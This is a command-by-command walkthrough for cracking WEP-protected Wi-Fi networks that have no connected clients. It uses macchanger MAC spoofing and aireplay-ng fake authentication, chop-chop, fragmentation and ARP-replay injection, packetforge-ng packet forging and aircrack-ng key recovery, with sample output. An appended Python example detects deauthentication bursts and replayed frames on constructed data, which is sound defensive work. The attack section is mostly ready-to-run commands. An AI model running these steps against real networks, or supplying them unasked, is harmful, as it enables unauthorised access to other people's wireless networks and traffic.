- cracking a WEP encrypted network with no client connected (clientless):
- -----------------------------------------------
- (1)spoof wireless card mac address
- (2)put wireless card into monitor mode
- (3)scan for the target AP using airodump-ng
- (4)fake authentication using aireplay-ng option -1
- (5)use the KoreK chop-chop attack, the fragmentation attack or
- the old pre-PTW method (aireplay-ng -2 -p 0841 option).
- (6)deauthenticate a non-connected client from the AP (to speed up injection; not sure why, but it usually works)
- (7)find the WEP key using aircrack-ng
- ------------------------------------------------
- (1)spoof our wireless card's MAC address:
- ifconfig ath0 down
- ifconfig wifi0 down
- macchanger --mac 00:11:22:33:44:55 wifi0
- my output is:
- Current MAC: <my mac> (unknown)
- Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
- (2)put wireless card into monitor mode:
- ifconfig wifi0 up
- ifconfig ath0 down
- airmon-ng start wifi0
- my output is:
- ...
- Interface Chipset Driver
- wifi0 Atheros madwifi-ng
- ath0 Atheros madwifi-ng VAP (parent: wifi0)
- ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
- (3)scan for the target AP using airodump-ng:
- airodump-ng ath1
- hit ctrl+c to quit, then note the channel and copy and paste the BSSID (MAC address of the AP):
- airodump-ng -c <channel> -w <output> --bssid <APmac> rausb0
- (here we focus on one specific AP so that we filter out any other possibility of interference from other APs on the same channel,
- hence reducing the chance of a failed auth/association or a failed attack)
- other commands that can be used:
- airodump-ng -w <output> --ivs -c <channel> ath1
- (4)fake authentication using aireplay-ng option -1:
- aireplay-ng -1 0 -e <APname> -a <APmac> -h <yourmac> ath1
- other command that can be used:
- aireplay-ng -1 6000 -o 1 -q 10 -e <APname> -a <APmac> -h <yourmac> rausb0
- (5)use the KoreK chop-chop attack, the fragmentation attack or
- the old pre-PTW method (aireplay-ng -2 -p 0841 option):
- #KoreK chop-chop attack (-4 option):
- ----------------------------------
- 1-make a XOR (keystream) file using the chop-chop attack -4 option, to use with packetforge-ng:
- aireplay-ng -4 -b <APmac> -h <yourmac> ath1
- wait and answer yes.
- output is:
- Saving plaintext in replay_whatever.cap...
- Saving keystream in replay_whatever.xor
- 2-create an ARP packet using packetforge-ng:
- packetforge-ng -0 -a <APmac> -h <yourmac> -k 255.255.255.255 -l 255.255.255.255 -y replay_whatever.xor -w arp-request
- output is:
- wrote packet to: arp-request
- 3-inject the ARP packet:
- aireplay-ng -2 -r arp-request ath1
- say yes... and wait.
- 4-find the WEP key using aircrack-ng:
- aircrack-ng <output>*.cap
- #fragmentation attack (-5 option):
- ---------------------------------
- 1-make a XOR (keystream) file using the fragmentation attack -5 option (it generates a valid keystream), to use with packetforge-ng:
- aireplay-ng -5 -b <ApMac> -h <yrMac> ath1
- answer yes.
- output is:
- Saving keystream in replay_whatever.xor
- 2-create an ARP packet using packetforge-ng:
- packetforge-ng -0 -a <ApMac> -h <yrMac> -k 255.255.255.255 -l 255.255.255.255 -y replay_whatever.xor -w arp-request
- 3-inject the ARP packet:
- aireplay-ng -2 -r arp-request ath1
- answer yes... and wait.
- 4-find the WEP key using aircrack-ng:
- aircrack-ng <output>*.cap
- #the old pre-PTW method (aireplay-ng -2 -p 0841 option):
- --------------------------------------------------
- 1.aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <ApMac> -h <yrMac> ath1
- 2-find the WEP key using aircrack-ng:
- aircrack-ng <output>*.cap
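From the defender's side, the steps above leave two loud traces in a monitor-mode capture: a burst of deauthentication frames from one source (step 6) and the same encrypted data frame re-sent many times (the ARP replay in step 5, which re-injects one captured frame unchanged, so its WEP IV never changes, while a real station picks a fresh IV per frame). The script below is an added example and is not part of the original paste; it works on a constructed list of frame records (dicts with a timestamp, frame subtype, source MAC, BSSID and raw body) rather than a real capture, and the threshold values are assumptions to be tuned per site.

```python
"""Added example: flag deauth bursts and replayed data frames in a capture.
Frames are plain dicts; a real deployment would build them from a capture
library instead of the constructed sample at the bottom of this file."""
from collections import Counter, defaultdict, deque

DEAUTH_THRESHOLD = 10   # assumed: deauth frames from one source inside the window
DEAUTH_WINDOW_S = 2.0   # assumed: sliding window length in seconds
REPLAY_THRESHOLD = 20   # assumed: identical data frames from one source


def detect_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window=DEAUTH_WINDOW_S):
    """Return {src: peak_count} for sources that sent >= threshold
    deauthentication frames within any sliding window of `window` seconds."""
    recent = defaultdict(deque)   # src -> timestamps still inside the window
    flagged = {}
    for f in sorted(frames, key=lambda f: f["ts"]):
        if f["subtype"] != "deauth":
            continue
        q = recent[f["src"]]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:   # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[f["src"]] = max(flagged.get(f["src"], 0), len(q))
    return flagged


def detect_replayed_data(frames, threshold=REPLAY_THRESHOLD):
    """Return {(src, bssid): count} for sources that transmitted a byte-identical
    encrypted data frame body (so the same WEP IV and ciphertext) >= threshold
    times. A legitimate station would use a fresh IV for each frame."""
    counts = Counter(
        (f["src"], f["bssid"], f["body"]) for f in frames if f["subtype"] == "data"
    )
    flagged = {}
    for (src, bssid, _body), n in counts.items():
        if n >= threshold:
            flagged[(src, bssid)] = max(flagged.get((src, bssid), 0), n)
    return flagged


def build_sample_capture():
    """Constructed sample capture (not real traffic)."""
    ap = "00:aa:bb:cc:dd:ee"            # constructed AP BSSID
    injector = "00:11:22:33:44:55"      # the spoofed MAC used in the walkthrough
    legit = "00:de:ad:be:ef:01"         # constructed legitimate station
    frames = []
    # Legitimate station: a different IV (first three body bytes) on every frame.
    for i in range(30):
        frames.append({"ts": i * 0.1, "subtype": "data", "src": legit, "bssid": ap,
                       "body": bytes([i, 0, 0]) + b"\x00" * 40})
    # Replayed ARP request: the identical body re-sent 50 times in half a second.
    arp = bytes([7, 7, 7]) + b"\x11" * 40
    for i in range(50):
        frames.append({"ts": 3.0 + i * 0.01, "subtype": "data", "src": injector,
                       "bssid": ap, "body": arp})
    # Deauth burst: 25 frames within 0.5 s from the same source.
    for i in range(25):
        frames.append({"ts": 5.0 + i * 0.02, "subtype": "deauth", "src": injector,
                       "bssid": ap, "body": b""})
    # A single, benign deauth from the AP itself should not be flagged.
    frames.append({"ts": 9.0, "subtype": "deauth", "src": ap, "bssid": ap, "body": b""})
    return frames


if __name__ == "__main__":
    cap = build_sample_capture()
    print("deauth bursts:", detect_deauth_bursts(cap))
    print("replayed data:", detect_replayed_data(cap))
```

Both checks key on the source MAC, which is exactly the field the walkthrough spoofs, so treat the flagged address as a lead rather than an identity; the useful signal is the burst itself, and the fix for the underlying weakness is to retire WEP rather than to tune thresholds.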